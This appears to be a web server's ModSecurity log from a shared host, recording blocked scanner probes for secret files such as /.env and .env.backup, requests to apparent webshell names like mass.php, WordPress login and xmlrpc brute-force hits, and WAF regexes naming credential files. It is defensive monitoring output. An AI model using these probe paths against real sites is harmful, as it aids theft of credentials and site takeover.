[Tue May 26 16:50:49.116755 2026] [security2:error] [pid 817651:tid 817782] [client 23.240.141.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCD9lGRCPPN1dS2y3AgAAAAIY"]
[Tue May 26 16:50:49.687750 2026] [security2:error] [pid 823496:tid 823681] [client 85.11.167.49:58021] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 49.167.11.85.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "tufello.net"] [uri "/admin/phpinfo.php"] [unique_id "ahWCEZa08mrtyBNpA4PiDgAAADU"]
[Tue May 26 16:50:49.993045 2026] [security2:error] [pid 817651:tid 817784] [client 85.11.167.49:58210] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 49.167.11.85.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "tufello.net"] [uri "/pinfo.php"] [unique_id "ahWCEdlGRCPPN1dS2y3AjgAAAIg"]
[Tue May 26 16:50:50.094364 2026] [security2:error] [pid 823496:tid 823753] [client 195.178.110.204:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "207.174.214.47"] [uri "/index.php"] [unique_id "ahWCEZa08mrtyBNpA4PiFQAAAH0"]
[Tue May 26 16:50:50.094894 2026] [security2:error] [pid 823496:tid 823698] [client 195.178.110.204:37874] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "207.174.214.47"] [uri "/"] [unique_id "ahWCEZa08mrtyBNpA4PiEwAAAEY"]
[Tue May 26 16:50:50.300340 2026] [security2:error] [pid 823496:tid 823713] [client 85.11.167.49:58291] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 49.167.11.85.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "tufello.net"] [uri "/php_version.php"] [unique_id "ahWCEpa08mrtyBNpA4PiHAAAAFU"]
[Tue May 26 16:50:50.333312 2026] [security2:error] [pid 823496:tid 823722] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCEZa08mrtyBNpA4Ph9gAAAF4"]
[Tue May 26 16:50:50.614248 2026] [security2:error] [pid 823496:tid 823655] [client 20.206.111.149:2850] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/mass.php"] [unique_id "ahWCEpa08mrtyBNpA4PiIAAAABs"]
[Tue May 26 16:50:50.614331 2026] [security2:error] [pid 823496:tid 823655] [client 20.206.111.149:2850] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/mass.php"] [unique_id "ahWCEpa08mrtyBNpA4PiIAAAABs"]
[Tue May 26 16:50:50.791848 2026] [security2:error] [pid 823496:tid 823536] [remote 103.50.205.131:54974] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 131.205.50.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWCEpa08mrtyBNpA4PiIQAAaCU"]
[Tue May 26 16:50:50.896503 2026] [security2:error] [pid 823496:tid 823725] [client 125.228.216.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWCEpa08mrtyBNpA4PiKgAAAGE"], referer: https://www.anujtradingco.com/
[Tue May 26 16:50:50.928214 2026] [security2:error] [pid 817651:tid 817800] [client 85.11.167.49:58365] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "tufello.net"] [uri "/.env"] [unique_id "ahWCEtlGRCPPN1dS2y3AlwAAAJg"]
[Tue May 26 16:50:51.200709 2026] [security2:error] [pid 823496:tid 823730] [client 85.208.96.201:56606] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/february-21st/list/"] [unique_id "ahWCE5a08mrtyBNpA4PiLwAAAGY"]
[Tue May 26 16:50:51.200855 2026] [security2:error] [pid 823496:tid 823730] [client 85.208.96.201:56606] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/february-21st/list/"] [unique_id "ahWCE5a08mrtyBNpA4PiLwAAAGY"]
[Tue May 26 16:50:51.729951 2026] [security2:error] [pid 817651:tid 817855] [client 85.11.167.49:58365] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "tufello.net"] [uri "/.env.backup"] [unique_id "ahWCE9lGRCPPN1dS2y3AoQAAAM8"]
[Tue May 26 16:50:51.882561 2026] [security2:error] [pid 817651:tid 817877] [client 85.11.167.49:58365] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "tufello.net"] [uri "/config/.env"] [unique_id "ahWCE9lGRCPPN1dS2y3ApgAAAOU"]
[Tue May 26 16:50:52.062515 2026] [security2:error] [pid 823496:tid 823652] [client 125.228.216.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWCE5a08mrtyBNpA4PiPAAAABg"], referer: https://www.anujtradingco.com/pages/services-wide/?unapproved=1264128&moderation-hash=53cb562d88264cf6f2dea3bbdd74776a
[Tue May 26 16:50:52.106293 2026] [security2:error] [pid 817651:tid 817828] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCE9lGRCPPN1dS2y3AmwAAALQ"]
[Tue May 26 16:50:52.843730 2026] [security2:error] [pid 823496:tid 823538] [remote 160.250.186.220:37164] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.186.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-login.php"] [unique_id "ahWCFJa08mrtyBNpA4PiRQAAQic"]
[Tue May 26 16:50:53.275269 2026] [security2:error] [pid 823496:tid 823712] [client 20.206.111.149:64496] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/dropdown.php"] [unique_id "ahWCFZa08mrtyBNpA4PiVAAAAFQ"]
[Tue May 26 16:50:53.275399 2026] [security2:error] [pid 823496:tid 823712] [client 20.206.111.149:64496] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/dropdown.php"] [unique_id "ahWCFZa08mrtyBNpA4PiVAAAAFQ"]
[Tue May 26 16:50:53.298991 2026] [security2:error] [pid 823496:tid 823648] [client 64.233.173.102:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahWCFJa08mrtyBNpA4PiRwAAABQ"]
[Tue May 26 16:50:53.625556 2026] [security2:error] [pid 823496:tid 823669] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCFJa08mrtyBNpA4PiQQAAACk"]
[Tue May 26 16:50:54.806511 2026] [security2:error] [pid 823496:tid 823630] [client 117.198.37.168:54798] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWCFpa08mrtyBNpA4PidQAAAAI"]
[Tue May 26 16:50:54.806655 2026] [security2:error] [pid 823496:tid 823630] [client 117.198.37.168:54798] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWCFpa08mrtyBNpA4PidQAAAAI"]
[Tue May 26 16:50:55.377891 2026] [security2:error] [pid 817651:tid 817858] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCFtlGRCPPN1dS2y3AwAAAANI"]
[Tue May 26 16:50:55.665618 2026] [security2:error] [pid 817651:tid 817865] [client 192.178.8.72:52439] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 72.8.178.192.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.karuppuswamykovil.in"] [uri "/temple-significance.php"] [unique_id "ahWCF9lGRCPPN1dS2y3AxwAAANk"]
[Tue May 26 16:50:55.813649 2026] [security2:error] [pid 817651:tid 817784] [client 20.206.111.149:26952] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/wp-good.php"] [unique_id "ahWCF9lGRCPPN1dS2y3AygAAAIg"]
[Tue May 26 16:50:55.813761 2026] [security2:error] [pid 817651:tid 817784] [client 20.206.111.149:26952] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/wp-good.php"] [unique_id "ahWCF9lGRCPPN1dS2y3AygAAAIg"]
[Tue May 26 16:50:56.026666 2026] [security2:error] [pid 823496:tid 823717] [client 37.139.53.229:59774] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWCF5a08mrtyBNpA4PiiwAAAFk"], referer: https://anujtradingco.com
[Tue May 26 16:50:57.568551 2026] [security2:error] [pid 823496:tid 823630] [client 20.206.111.149:2528] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/mifta.php"] [unique_id "ahWCGZa08mrtyBNpA4Pi9QAAAAI"]
[Tue May 26 16:50:57.568689 2026] [security2:error] [pid 823496:tid 823630] [client 20.206.111.149:2528] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/mifta.php"] [unique_id "ahWCGZa08mrtyBNpA4Pi9QAAAAI"]
[Tue May 26 16:50:57.883513 2026] [security2:error] [pid 817651:tid 817875] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCGdlGRCPPN1dS2y3A1QAAAOM"]
[Tue May 26 16:50:57.928078 2026] [security2:error] [pid 817651:tid 817850] [client 125.228.216.16:49698] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWCGdlGRCPPN1dS2y3A1wAAAMo"], referer: https://anujtradingco.com
[Tue May 26 16:50:58.395147 2026] [security2:error] [pid 823496:tid 823656] [client 167.160.75.243:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWCGpa08mrtyBNpA4PjBQAAABw"], referer: https://www.anujtradingco.com/
[Tue May 26 16:50:58.594288 2026] [security2:error] [pid 823496:tid 823694] [client 172.225.77.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWCGpa08mrtyBNpA4PjDAAAAEI"]
[Tue May 26 16:50:59.217484 2026] [security2:error] [pid 823496:tid 823651] [client 20.206.111.149:2534] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/amxloxxr.php"] [unique_id "ahWCG5a08mrtyBNpA4PjFwAAABc"]
[Tue May 26 16:50:59.217611 2026] [security2:error] [pid 823496:tid 823651] [client 20.206.111.149:2534] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/amxloxxr.php"] [unique_id "ahWCG5a08mrtyBNpA4PjFwAAABc"]
[Tue May 26 16:50:59.256056 2026] [security2:error] [pid 823496:tid 823692] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCGpa08mrtyBNpA4PjAwAAAEA"]
[Tue May 26 16:50:59.613178 2026] [security2:error] [pid 823496:tid 823677] [client 167.160.75.243:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWCG5a08mrtyBNpA4PjHAAAADE"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1230906&moderation-hash=ba033614e47bbe413fcd130609457956
[Tue May 26 16:51:02.080366 2026] [security2:error] [pid 823496:tid 823662] [client 20.206.111.149:59974] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/file59.php"] [unique_id "ahWCHpa08mrtyBNpA4PjNAAAACI"]
[Tue May 26 16:51:02.080480 2026] [security2:error] [pid 823496:tid 823662] [client 20.206.111.149:59974] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/file59.php"] [unique_id "ahWCHpa08mrtyBNpA4PjNAAAACI"]
[Tue May 26 16:51:02.193382 2026] [security2:error] [pid 823496:tid 823637] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCHZa08mrtyBNpA4PjJQAAAAk"]
[Tue May 26 16:51:03.577537 2026] [security2:error] [pid 823496:tid 823672] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCHpa08mrtyBNpA4PjPwAAACw"]
[Tue May 26 16:51:04.010401 2026] [security2:error] [pid 823496:tid 823577] [remote 2401:4900:630f:8d17:3812:19ff:fef1:c121:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWCHpa08mrtyBNpA4PjSAAAa04"], referer: https://kingsclub.in/banquets/
[Tue May 26 16:51:04.418732 2026] [security2:error] [pid 823496:tid 823738] [client 20.206.111.149:25366] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/asasx.php"] [unique_id "ahWCIJa08mrtyBNpA4PjXgAAAG4"]
[Tue May 26 16:51:04.418832 2026] [security2:error] [pid 823496:tid 823738] [client 20.206.111.149:25366] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/asasx.php"] [unique_id "ahWCIJa08mrtyBNpA4PjXgAAAG4"]
[Tue May 26 16:51:04.611134 2026] [security2:error] [pid 823496:tid 823590] [remote 2401:4900:630f:8d17:3812:19ff:fef1:c121:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWCH5a08mrtyBNpA4PjVwAAZVs"], referer: https://kingsclub.in/banquets/
[Tue May 26 16:51:04.639039 2026] [security2:error] [pid 823496:tid 823700] [client 2401:4900:630f:8d17:3812:19ff:fef1:c121:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWCH5a08mrtyBNpA4PjWAAASBI"], referer: https://kingsclub.in/banquets/
[Tue May 26 16:51:05.111942 2026] [security2:error] [pid 823496:tid 823714] [client 117.198.37.168:55120] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWCIZa08mrtyBNpA4PjaAAAAFY"]
[Tue May 26 16:51:05.112069 2026] [security2:error] [pid 823496:tid 823714] [client 117.198.37.168:55120] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWCIZa08mrtyBNpA4PjaAAAAFY"]
[Tue May 26 16:51:05.821662 2026] [security2:error] [pid 823496:tid 823664] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCIJa08mrtyBNpA4PjYwAAACQ"]
[Tue May 26 16:51:05.957209 2026] [security2:error] [pid 817651:tid 817759] [remote 2401:4900:630f:8d17:3812:19ff:fef1:c121:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWCIdlGRCPPN1dS2y3BJQAA-ms"], referer: https://kingsclub.in/banquets/
[Tue May 26 16:51:06.512590 2026] [security2:error] [pid 817651:tid 817684] [remote 2401:4900:630f:8d17:3812:19ff:fef1:c121:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWCIdlGRCPPN1dS2y3BKAAAhyA"], referer: https://kingsclub.in/banquets/
[Tue May 26 16:51:06.527905 2026] [security2:error] [pid 817651:tid 817813] [client 20.206.111.149:38519] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/wp-admin/network/edit.php"] [unique_id "ahWCItlGRCPPN1dS2y3BMAAAAKU"]
[Tue May 26 16:51:06.528049 2026] [security2:error] [pid 817651:tid 817813] [client 20.206.111.149:38519] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/wp-admin/network/edit.php"] [unique_id "ahWCItlGRCPPN1dS2y3BMAAAAKU"]
[Tue May 26 16:51:06.646885 2026] [security2:error] [pid 823496:tid 823626] [remote 2401:4900:630f:8d17:3812:19ff:fef1:c121:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWCIZa08mrtyBNpA4PjcgAAXH8"], referer: https://kingsclub.in/banquets/
[Tue May 26 16:51:07.037450 2026] [security2:error] [pid 817651:tid 817786] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCItlGRCPPN1dS2y3BKgAAAIo"]
[Tue May 26 16:51:07.371278 2026] [security2:error] [pid 823496:tid 823519] [remote 2401:4900:630f:8d17:3812:19ff:fef1:c121:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWCIpa08mrtyBNpA4PjfgAAABQ"], referer: https://kingsclub.in/banquets/
[Tue May 26 16:51:07.420162 2026] [security2:error] [pid 817651:tid 817662] [remote 2401:4900:630f:8d17:3812:19ff:fef1:c121:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWCItlGRCPPN1dS2y3BMgAA0wo"], referer: https://kingsclub.in/banquets/
[Tue May 26 16:51:08.111330 2026] [security2:error] [pid 823496:tid 823541] [remote 2401:4900:630f:8d17:3812:19ff:fef1:c121:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWCI5a08mrtyBNpA4PjhgAADio"], referer: https://kingsclub.in/banquets/
[Tue May 26 16:51:09.605012 2026] [security2:error] [pid 823496:tid 823628] [client 20.206.111.149:25464] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/ms-edit.php"] [unique_id "ahWCJZa08mrtyBNpA4PjswAAAAA"]
